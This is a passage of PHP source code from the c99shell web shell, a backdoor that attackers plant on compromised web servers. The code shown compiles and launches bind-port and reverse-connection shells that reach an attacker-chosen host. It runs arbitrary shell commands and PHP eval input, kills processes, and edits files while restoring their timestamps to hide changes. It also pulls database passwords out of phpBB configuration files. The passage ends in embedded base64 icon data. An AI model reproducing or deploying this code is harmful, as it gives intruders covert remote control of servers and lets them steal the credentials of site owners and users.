"c99sh_bindport.c"=>array("Using C","%path %port %pass")

);

$bcsrcs = array(

"c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),

"c99sh_backconn.c"=>array("Using C","%path %host %port")

);

if ($win) {echo "Binding port and Back connect:
This functions not work in Windows!
";}

else

{

if (!is_array($bind)) {$bind = array();}

if (!is_array($bc)) {$bc = array();}

if (!is_numeric($bind[port])) {$bind[port] = $bindport_port;}

if (empty($bind[pass])) {$bind[pass] = $bindport_pass;}

if (empty($bc[host])) {$bc[host] = $REMOTE_ADDR;}

if (!is_numeric($bc[port])) {$bc[port] = $bindport_port;}

if (!empty($bindsubmit))

{

echo "Result of binding port:
";

$v = $bndportsrcs[$bind[src]];

if (empty($v)) {echo "Unknown file!
";}

elseif (fsockopen($SERVER_ADDR,$bind[port],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
";}

else

{

$srcpath = $tmpdir.$bind[src];

$w = explode(".",$bind[src]);

$ext = $w[count($w)-1];

unset($w[count($w)-1]);

$binpath = $tmpdir.join(".",$w);

if ($ext == "pl") {$binpath = $srcpath;}

@unlink($srcpath);

$fp = fopen($srcpath,"ab+");

if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
";}

else

{

$data = base64_decode($bndsrcs[$bind[src]]);

fwrite($fp,$data,strlen($data));

fclose($fp);

if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}

$v[1] = str_replace("%path",$binpath,$v[1]);

$v[1] = str_replace("%port",$bind[port],$v[1]);

$v[1] = str_replace("%pass",$bind[pass],$v[1]);

$v[1] = str_replace("//","/",$v[1]);

$retbind = myshellexec($v[1]." > /dev/null &");

sleep(5); //Timeout

$sock = fsockopen("localhost",$bind[port],$errno,$errstr,5);

if (!$sock) {echo "I can't connect to localhost:".$bind[port]."! I think you should configure your firewall.";}

else {echo "Binding... ok! Connect to ".$SERVER_ADDR.":".$bind[port]."! You should use NetCat©, run \"nc -v ".$SERVER_ADDR." ".$bind[port]."\"!

View binder's process
";}

}

echo "
";

}

}

if (!empty($bcsubmit))

{

echo "Result of back connection:
";

$v = $bcsrcs[$bc[src]];

if (empty($v)) {echo "Unknown file!
";}

else

{

$srcpath = $tmpdir.$bc[src];

$w = explode(".",$bc[src]);

$ext = $w[count($w)-1];

unset($w[count($w)-1]);

$binpath = $tmpdir.join(".",$w);

if ($ext == "pl") {$binpath = $srcpath;}

@unlink($srcpath);

$fp = fopen($srcpath,"ab+");

if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
";}

else

{

$data = base64_decode($bndsrcs[$bind[src]]);

fwrite($fp,$data,strlen($data));

fclose($fp);

if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}

$v[1] = str_replace("%path",$binpath,$v[1]);

$v[1] = str_replace("%host",$bc[host],$v[1]);

$v[1] = str_replace("%port",$bc[port],$v[1]);

$v[1] = str_replace("//","/",$v[1]);

$retbind = myshellexec($v[1]." > /dev/null &");

echo "Now script try connect to ".$bc[host].":".$bc[port]."...
";

}

}

}

?>Binding port:

Port:  Password:  <?php

foreach($bndportsrcs as $k=>$v) {echo "".$v[0]."";}

?>

 

Back connection:

HOST:  Port:  <?php

foreach($bcsrcs as $k=>$v) {echo "".$v[0]."";}

?>

 

Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p <port>"!<?php

}

}

if ($act == "cmd")

{

if (!empty($submit))

{

echo "Result of execution this command:
";

$tmp = ob_get_contents();

$olddir = realpath(".");

@chdir($d);

if ($tmp)

{

ob_clean();

myshellexec($cmd);

$ret = ob_get_contents();

$ret = convert_cyr_string($ret,"d","w");

ob_clean();

echo $tmp;

if ($cmd_txt)

{

$rows = count(explode("

",$ret))+1;

if ($rows < 10) {$rows = 10;}

echo "".htmlspecialchars($ret)."";

}

else {echo $ret;}

}

else

{

if ($cmd_txt)

{

echo "";

myshellexec($cmd);

echo "";

}

else {echo $ret;}

}

@chdir($olddir);

}

else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = true;}}

echo "

".htmlspecialchars($cmd)." Display in text-area ";

}

if ($act == "ps_aux")

{

echo "Processes:
";

if ($win) {echo "This function not work in Windows!
";}

else

{

if ($pid)

{

if (!$sig) {$sig = 9;}

echo "Sending signal ".$sig." to #".$pid."... ";

$ret = posix_kill($pid,$sig);

if ($ret) {echo "ok. he is dead, amen.";}

else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";}

}

$ret = `ps -aux`;

if (!$ret) {echo "Can't execute \"ps -aux\"!";}

else

{

$ret = htmlspecialchars($ret);

$ret = str_replace(""," ",$ret);

while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);}

$prcs = explode("\n",$ret);

$head = explode(" ",$prcs[0]);

$head[] = "ACTION";

unset($prcs[0]);

echo "

echo "

";

foreach ($head as $v) {echo "

   ".$v."   ";}

echo "

";

foreach ($prcs as $line)

{

if (!empty($line))

{

echo "

";

$line = explode(" ",$line);

$line[10] = join(" ",array_slice($line,10,count($line)));

$line = array_slice($line,0,11);

$line[] = "KILL";

foreach ($line as $v) {echo "

   ".$v."   ";}

echo "

";

}

}

echo "

";

}

}

}

if ($act == "eval")

{

if (!empty($eval))

{

echo "Result of execution this PHP-code:
";

$tmp = ob_get_contents();

$olddir = realpath(".");

@chdir($d);

if ($tmp)

{

ob_clean();

eval($eval);

$ret = ob_get_contents();

$ret = convert_cyr_string($ret,"d","w");

ob_clean();

echo $tmp;

if ($eval_txt)

{

$rows = count(explode("

",$ret))+1;

if ($rows < 10) {$rows = 10;}

echo "".htmlspecialchars($ret)."";

}

else {echo $ret;}

}

else

{

if ($eval_txt)

{

echo "";

eval($eval);

echo "";

}

else {echo $ret;}

}

@chdir($olddir);

}

else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = true;}}

echo "

".htmlspecialchars($eval)." Display in text-area ";

}

if ($act == "f")

{

$r = @file_get_contents($d.$f);

if (!is_readable($d.$f) and $ft != "edit")

{

if (file_exists($d.$f)) {echo "

Permision denied (".htmlspecialchars($d.$f).")!
";}

else {echo "

File does not exists (".htmlspecialchars($d.$f).")! Create
";}

}

else

{

$ext = explode(".",$f);

$c = count($ext)-1;

$ext = $ext[$c];

$ext = strtolower($ext);

$rft = "";

foreach($ftypes as $k=>$v)

{

if (in_array($ext,$v)) {$rft = $k; break;}

}

if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}

if (empty($ft)) {$ft = $rft;}

$arr = array(

array("%5C%22%22.%24surl.%22act=img&img=ext_diz%5C%22","info"),

array("%5C%22%22.%24surl.%22act=img&img=ext_html%5C%22","html"),

array("%5C%22%22.%24surl.%22act=img&img=ext_txt%5C%22","txt"),

array("Code","code"),

array("Session","phpsess"),

array("%5C%22%22.%24surl.%22act=img&img=ext_exe%5C%22","exe"),

array("SDB","sdb"),

array("%5C%22%22.%24surl.%22act=img&img=ext_gif%5C%22","img"),

array("%5C%22%22.%24surl.%22act=img&img=ext_ini%5C%22","ini"),

array("%5C%22%22.%24surl.%22act=img&img=download%5C%22","download"),

array("%5C%22%22.%24surl.%22act=img&img=ext_rtf%5C%22","notepad"),

array("%5C%22%22.%24surl.%22act=img&img=change%5C%22","edit")

);

echo "Viewing file:    %5C%22%22.%24surl.%22act=img&img=ext_%22.%24ext.%22%5C%22 ".$f." (".view_size(filesize($d.$f)).")      ";

if (is_writable($d.$f)) {echo "full read/write access (".view_perms(fileperms($d.$f)).")";}

else {echo "Read-Only (".view_perms(fileperms($d.$f)).")";}

echo "
Select action/file-type:
";

foreach($arr as $t)

{

if ($t[1] == $rft) {echo " ".$t[0]."";}

elseif ($t[1] == $ft) {echo " ".$t[0]."";}

else

{

echo " ".$t[0]."";

}

echo " (+) |";

}

echo "


";

if ($ft == "info")

{

echo "Information:";

echo "

echo "

Size ".view_size(filesize($d.$f))."";

echo "

MD5 ".md5_file($d.$f)."";

if (!$win)

{

echo "

Owner/Group ";

$tmp=posix_getpwuid(fileowner($d.$f));

if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";

else echo $tmp['name']." ";

$tmp=posix_getgrgid(filegroup($d.$f));

if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);

else echo $tmp['name'];

}

echo "

Perms";

if (is_writable($d.$f))

{

echo "".view_perms(fileperms($d.$f))."";

}

else

{

echo "".view_perms(fileperms($d.$f))."";

}

echo "

";

echo "

Create time ".date("d/m/Y H:i:s",filectime($d.$f))."";

echo "

Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."";

echo "

MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."";

echo "


";

$fi = fopen($d.$f,"rb");

if ($fi)

{

if ($fullhexdump)

{

echo "FULL HEXDUMP";

$str=fread($fi,filesize($d.$f));

}

else

{

echo "HEXDUMP PREVIEW";

$str=fread($fi,$hexdump_lines*$hexdump_rows);

}

$n=0;

$a0="00000000
";

$a1="";

$a2="";

for ($i=0; $i

{

$a1.=sprintf("%02X",ord($str[$i])).' ';

switch (ord($str[$i]))

{

case 0: $a2.="0"; break;

case 32:

case 10:

case 13: $a2.=" "; break;

default: $a2.=htmlspecialchars($str[$i]);

}

$n++;

if ($n == $hexdump_rows)

{

$n = 0;

if ($i+1";}

$a1.="
";

$a2.="
";

}

}

//if ($a1!="") {$a0.=sprintf("%08X",$i)."
";}

echo "

"class=sy>

$a0".

"$a1

$a2
";

}

$encoded = "";

if ($base64 == 1)

{

echo "Base64 Encode
";

$encoded = base64_encode($r);

}

elseif($base64 == 2)

{

echo "Base64 Encode + Chunk
";

$encoded = chunk_split(base64_encode($r));

}

elseif($base64 == 3)

{

echo "Base64 Encode + Chunk + Quotes
";

$encoded = base64_encode($r);

$encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);

}

elseif($base64 == 4)

{

}

if (!empty($encoded))

{

echo "".htmlspecialchars($encoded)."
";

}

echo "HEXDUMP: [Full] [Preview]Base64:

[Encode

[+chunk

[+chunk+quotes

[Decode

";

}

elseif ($ft == "html")

{

if ($white) {@ob_clean();}

echo $r;

if ($white) {exit;}

}

elseif ($ft == "txt")

{

echo "

".htmlspecialchars($r)."
";

}

elseif ($ft == "ini")

{

echo "

";

var_dump(parse_ini_file($d.$f,true));

echo "

";

}

elseif ($ft == "phpsess")

{

echo "

";

$v = explode("|",$r);

echo $v[0]."
";

var_dump(unserialize($v[1]));

echo "

";

}

elseif ($ft == "exe")

{

echo "

 ";

}

elseif ($ft == "sdb")

{

echo "

";

var_dump(unserialize(base64_decode($r)));

echo "

";

}

elseif ($ft == "code")

{

if (ereg("phpBB 2.(.*) auto-generated config file",$r))

{

$arr = explode("

",$r);

if (count($arr == 18))

{

include($d.$f);

echo "phpBB configuration is detected in this file!
";

if ($dbms == "mysql4") {$dbms = "mysql";}

if ($dbms == "mysql") {echo "Connect to DB
";}

else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell";}

echo "Parameters for manual connect:
";

$cfgvars = array(

"dbms"=>$dbms,

"dbhost"=>$dbhost,

"dbname"=>$dbname,

"dbuser"=>$dbuser,

"dbpasswd"=>$dbpasswd

);

foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
";}

echo "";

echo "


";

}

}

echo "

";

if (!empty($white)) {@ob_clean();}

if ($rehtml) {$r = rehtmlspecialchars($r);}

$r = stripslashes($r);

$strip = false;

if(!strpos($r,"") && substr($r,0,2)!="") {$r="<?php \n".trim($r)."\n?>"; $r = trim($r); $strip = true;}

$r = @highlight_string($r, TRUE);

if ($delspace) {$buffer = str_replace (" ", " ", $r);}

echo $r;

if (!empty($white)) {exit;}

echo "

";

}

elseif ($ft == "download")

{

@ob_clean();

header("Content-type: c99shell");

header("Content-disposition: attachment; filename=\"".$f."\";");

echo($r);

exit;

}

elseif ($ft == "notepad")

{

@ob_clean();

header("Content-type: text/plain");

header("Content-disposition: attachment; filename=\"".$f.".txt\";");

echo($r);

exit;

}

elseif ($ft == "img")

{

if (!$white)

{

echo "

%5C%22%22.%24surl.%22act=f&f=%22.urlencode(%24f).%22&ft=img&white=1&d=%22.urlencode(%24d).%22%5C%22
";

}

else

{

@ob_clean();

$ext = explode($f,".");

$ext = $ext[count($ext)-1];

header("Content-type: image/gif");

echo($r);

exit;

}

}

elseif ($ft == "edit")

{

if (!empty($submit))

{

if ($filestealth) {$stat = stat($d.$f);}

if (!is_writable($d.$f) and $autochmod) {@chmod($d.$f,$autochmod);}

$fp = fopen($d.$f,"w");

if (!$fp) {echo "Can't write to file!";}

else

{

echo "Saved!";

fwrite($fp,$nfcontent);

fclose($fp);

if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}

$r = $nfcontent;

}

}

$rows = count(explode("

",$r));

if ($rows < 10) {$rows = 10;}

if ($rows > 30) {$rows = 30;}

echo "

  ".htmlspecialchars($r)."";

}

elseif (!empty($ft)) {echo "

Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
";}

else {echo "

Unknown extension (".$ext."), please, select type manually.
";}

}

}

if ($act == "phpinfo")

{

ob_end_clean();

phpinfo();

exit;

}

} $data = base64_decode("PGNlbnRlcj48Yj5DcmVkaXRzOjxicj5JZGVhLCBsZWFkaW5nIGFuZCBjb2RpbmcgYnkgdHJpc3RyYW1bQ0NUZWFNXS48YnI+QmV0YS10ZXN0aW5nIGFuZCBzb21lIHRpcHMgLSBOdWtMZW9OIFtBblRpU2hAUmUgdEVhTV0uPGJyPlRoYW5rcyBhbGwgd2hvIHJlcG9ydCBidWdzLjxicj5BbGwgYnVncyBzZW5kIHRvIHRyaXN0cmFtJ3MgSUNRICM2NTY1NTUgPGEgaHJlZj0iaHR0cDovL3d3cC5pY3EuY29tL3NjcmlwdHMvY29udGFjdC5kbGw/bXNndG89NjU2NTU1Ij48aW1nIHNyYz1odHRwOi8vd3dwLmljcS5jb20vc2NyaXB0cy9vbmxpbmUuZGxsP2ljcT02NTY1NTUmaW1nPTUgYm9yZGVyPTAgYWxpZ249YWJzbWlkZGxlPjwvYT4uPC9iPiA8L2NlbnRlcj4gwOLy7vAg4vvw4Obg5fIg4evg4+7k4PDt7vHy/CDu5O3u7PMg7/Du4vMg6u7y7vD76SDu8urr/vfo6yDl4+4g7eAg7OXx//Yg7vIg6O3l8uAsIOgg5Ov/IPLu4+4g9/LuLeH7IO3lIPPs5fDl8vwg7vIg8erz6ugg7/Do+Ovu8fwg8+Pr8+Ho8vzx/yDiIO/w7uPw4Ozs6PDu4uDt6OUuIM/u5PLu6+rt8+vgIOog7eDv6PHg7ej+IOvl7fwg8SDq7vLu8O7pIP8g8+/w4OLr/+sg8eXw4uXw4OzoLjxjZW50ZXI+PGI+z/Dg4ujr4DwvYj46PC9jZW50ZXI+IDxiPsL7IOzu5uXy5SDo5+zl7f/y/CDv8O7j8ODs7PMg7+4gwuD45ezzIPPx7O7y8OXt6P4sIOzl7f/y/CDt4PHy8O7p6ugsIOTo5+Dp7S4uLiDt7iDl8evoIML7LCDz4uDm4OXs++ksIPPk4Ovo8uUg6OvoIPLl7CDh7uvl5SDo5+zl7ejy5SDq7u/o8ODp8vssIPLuIP8g4fPk8yDi++3z5uTl7SDu8u7w4uDy/CDi4Owg/+n24C4gPC9iPjxicj7A4vLu8CDt5SDt5fG48iDu8uLl8vHy4uXt7e7x8ugg5+Ag4u7n7O7m7fvpIOLw5eQsIO3g7eXxuO376SD98u7pIO/w7uPw4Ozs7uksIPIu6i4g7u3gIO/w5eTu8fLg4uvl7eAg8u7r/OruIOTr/yDu5+3g6u7s6+Xt6P8u");

if ($act == "img")

{

@ob_clean();

$arrimg = array(

"arrow_ltr"=>

"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".

"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",

"back"=>

"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".

"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".

"Wg0JADs=",

"buffer"=>

"R0lGODlhFAAUAKIAAAAAAPj4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".

"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".

"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",

"change"=>

"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".

"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".

"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".

"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".

"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".

"zMshADs=",

"delete"=>

"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".

"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".

"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".

"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".

"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".

"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".

"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".

"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".

"jwVFHBgiEGQFIgQasYkcSbJQIAA7",

"download"=>

"R0lGODlhDwAQAJECAAAAAP///wAAACH5BAEAAAIALAAAAAAPABAAQAIslI8pAOH/WGoQqMOC".

"vAtqxIReuC1UZHGLapAhdzqpEn9Y7Wlplpc3ynqxWAUAOw==",

"edit"=>

"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA".

"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze".

"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61".

"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==",

"forward"=>

"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".

"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".

"WqsJADs=",

"home"=>

"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".

"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".

"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".

"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",

"mode"=>

"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fXwAAAAAAAAAAAAAAAAAAAAAA".

"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".

"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".

"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",

"refresh"=>

"R0lGODlhEQAUALMAAAAAAPHx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".

"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".

"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".

"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",

"search"=>

"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".

"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".

"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".

"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".

"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",

"setup"=>

"R0lGODlhFAAUAMQAAAAAAPj4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".

"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".

"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".

"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".

"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",

"small_dir"=>

"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39wAAAAAAAAAAAAAAAAAAAAAA".

"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".

"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",

"small_unk"=>

"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".

"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".

"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".

"/e31/uDu/dzr/Orz/eHu/fX6/vH4/vv+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".

"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".

"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".

"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".

"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".

"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".

"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".

"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".

"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".

"yAsokBkQADs=",

"sort_asc"=>

"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".

"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",

"sort_desc"=>

"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".

"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",

"sql_button_drop"=>

"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".

"/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".

"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".

"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".

"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".

"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".

"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".

"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".

"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".

"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".

"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".

"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".

"zP+Z///MAP/MM//MZv/Mmf/MzP/MAP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".

"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".

"AQEAOw==",

"sql_button_empty"=>

"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".

"/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

